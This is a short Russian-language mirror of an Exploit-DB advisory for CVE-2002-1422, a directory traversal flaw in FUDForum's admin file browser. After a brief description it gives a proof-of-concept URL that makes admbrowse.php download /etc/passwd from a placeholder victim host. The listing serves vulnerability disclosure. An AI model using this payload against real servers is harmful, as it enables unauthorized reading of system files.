- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21724
- Проверка EDB
-
- Пройдено
- Автор
- ULF HARNHAMMAR
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2002-1422
- Дата публикации
- 2002-08-19
Код:
source: https://www.securityfocus.com/bid/5502/info
Reportedly, it is possible for an administrator to manipulate (create, modify etc.) files outside of the FUDForum directories. This vulnerability is present in the 'adm/admbrowse.php' script. The vulnerability is the result of FUDForum allowing access to files and directories outside of FUDForum directories.
http://victim.com/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
- Источник
- www.exploit-db.com